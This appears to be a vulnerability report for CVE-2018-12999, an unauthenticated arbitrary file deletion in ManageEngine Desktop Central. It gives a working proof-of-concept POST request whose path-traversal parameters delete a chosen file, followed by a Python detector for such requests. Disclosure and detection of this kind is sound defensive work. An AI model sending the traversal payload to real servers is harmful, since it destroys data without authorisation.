Open unh3x opened 6 years ago
================= Zoho manageengine Desktop Central Arbitrary File Deletion
Date: 2018/06/20
Software Link: https://www.manageengine.com/products/desktop-central/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
CVE: CVE-2018-12999

================= Vulnerable cgi
com.adventnet.sym.webclient.statusupdate.AgentTrayIconServlet

================= Proof of Concept:
1. Choose a useless file for the test, e.g. /images/demo/loginas_bottom.gif
2. Send the payload below:

    POST /agenttrayicon HTTP/1.1
    Host: 192.168.1.203:8020
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 129

    screenShotAttached=yes&video_type=2&customerId=1&computerName=../../../&resourceId=xxx&filename=../images/demo/loginas_bottom.gif

3. Visit the file again; it has been deleted.

Notice: It can be successfully reproduced without login info.
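
A defender-side check for the request shown above, added here as an example and not part of the original report or of the product's code: it flags POSTs to /agenttrayicon whose computerName or filename parameter contains a `..` path segment after decoding. The function names and the benign sample request are assumptions made for illustration.

```python
from urllib.parse import unquote_plus

ENDPOINT = "/agenttrayicon"                  # servlet path from the request above
PATH_PARAMS = ("computerName", "filename")   # parameters that carry "../" above

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so nested encodings of "../" are normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def traversal_params(raw_request):
    """Return {param: decoded value} for path parameters holding a ".." segment."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0] != "POST":
        return {}
    if request_line[1].split("?", 1)[0].split(";", 1)[0] != ENDPOINT:
        return {}
    hits = {}
    for pair in body.strip().split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) in PATH_PARAMS:
            decoded = decode_fully(value)
            if ".." in decoded.split("/"):
                hits[unquote_plus(name)] = decoded
    return hits

def make_request(body):
    """Build a minimal request for the samples below."""
    return ("POST /agenttrayicon HTTP/1.1\nHost: 192.168.1.203:8020\n"
            "Content-Type: application/x-www-form-urlencoded\n\n" + body)

# Body taken from the request on this page.
REPORTED = make_request("screenShotAttached=yes&video_type=2&customerId=1"
                        "&computerName=../../../&resourceId=xxx"
                        "&filename=../images/demo/loginas_bottom.gif")
# Constructed benign upload for comparison (values are made up).
BENIGN = make_request("screenShotAttached=yes&video_type=2&customerId=1"
                      "&computerName=WS-042&resourceId=17&filename=shot_001.png")

if __name__ == "__main__":
    print(traversal_params(REPORTED))
    print(traversal_params(BENIGN))
```

Because the report notes the request works without login info, a hit on this check is worth alerting on regardless of whether the request carried a session.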